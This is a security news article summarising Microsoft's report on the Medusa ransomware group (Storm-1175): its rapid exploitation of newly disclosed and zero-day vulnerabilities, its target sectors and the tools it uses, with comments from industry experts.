The Medusa ransomware group has been operating at a fast pace, seizing short windows of opportunity in attacks across multiple verticals, Microsoft says.
Operating as a ransomware-as-a-service (RaaS), Medusa has been active since June 2021 and hit over 300 organizations in the critical infrastructure sector by February 2025.
The group is known for engaging in double extortion, stealing victims’ data in addition to encrypting it, as well as for relying on phishing and the exploitation of unpatched vulnerabilities for initial access.
In recent attacks, Medusa’s operators, tracked by Microsoft as Storm-1175, were seen moving rapidly from initial access to post-compromise operations, often within days or, in some cases, hours.
Additionally, the group was seen quickly weaponizing newly disclosed vulnerabilities, as well as exploiting zero-day bugs in web-facing systems.
“The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, the United Kingdom, and the United States,” Microsoft says.
Over the past three years, Medusa’s operators have exploited at least 16 vulnerabilities in Microsoft Exchange, Papercut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, SAP NetWeaver, CrushFTP, GoAnywhere MFT, SmarterMail, and BeyondTrust.
Storm-1175, Microsoft says, weaponizes newly disclosed vulnerabilities immediately. It was seen exploiting the NetWeaver bug one day after it was publicly disclosed on April 24, 2025.
The group was also seen chaining multiple security defects to obtain remote code execution (RCE) on the victims’ systems. It has also targeted Linux systems, including Oracle WebLogic instances.
According to Microsoft, the group has exploited at least three zero-day flaws, including CVE-2026-23760 (SmarterMail) and CVE-2025-10035 (GoAnywhere MFT). In some cases, Storm-1175 exploited the flaws seven days before public disclosure.
Following initial access, the gang typically deploys a web shell or remote access payload and proceeds to data exfiltration and the execution of file-encrypting ransomware within one day.
During this window, Storm-1175 establishes persistence, performs reconnaissance and lateral movement, modifies firewall settings to enable remote access, and exfiltrates credentials.
“We have also observed that after gaining administrator credentials, Storm-1175 has used a script to recover passwords from Veeam backup software, which is used to connect to remote hosts, therefore enabling ransomware deployment to additional connected systems,” Microsoft notes.
The hackers have been using living-off-the-land binaries such as PowerShell and PsExec, along with Cloudflare tunnels, Remote Desktop Protocol (RDP), various remote monitoring and management (RMM) tools, PDQ Deployer for payload execution, Impacket and Mimikatz for lateral movement and credential harvesting, and Bandizip and Rclone for data collection and exfiltration.
In light of Microsoft’s report, Tuskira co-founder and CEO Piyush Sharma and AttackIQ field CISO Pete Luban urge at-risk organizations to continuously inventory and monitor both internal and external systems to identify exploitable assets and reduce risks.
“The heightened speed and efficiency of these campaigns is a game-changer for organizations with high-pressure environments like hospitals, insurers, and banks, which is who Storm-1175 is primarily targeting. These organizations already have little tolerance for downtime, complex edge infrastructure, and a constant patching backlog, so a threat actor that can spot exposed assets and exploit them before defenders catch up has a much wider lane than it did even a year ago,” Sharma said.
Luban commented, “If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime, it’s the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data.”
Related: German Police Unmask REvil Ransomware Leader
Related: Stolen Logins Are Fueling Everything From Ransomware to Nation-State Cyberattacks
Related: Cisco Firewall Vulnerability Exploited as Zero-Day in Interlock Ransomware Attacks
Related: Medusa Ransomware Uses Malicious Driver to Disable Security Tools
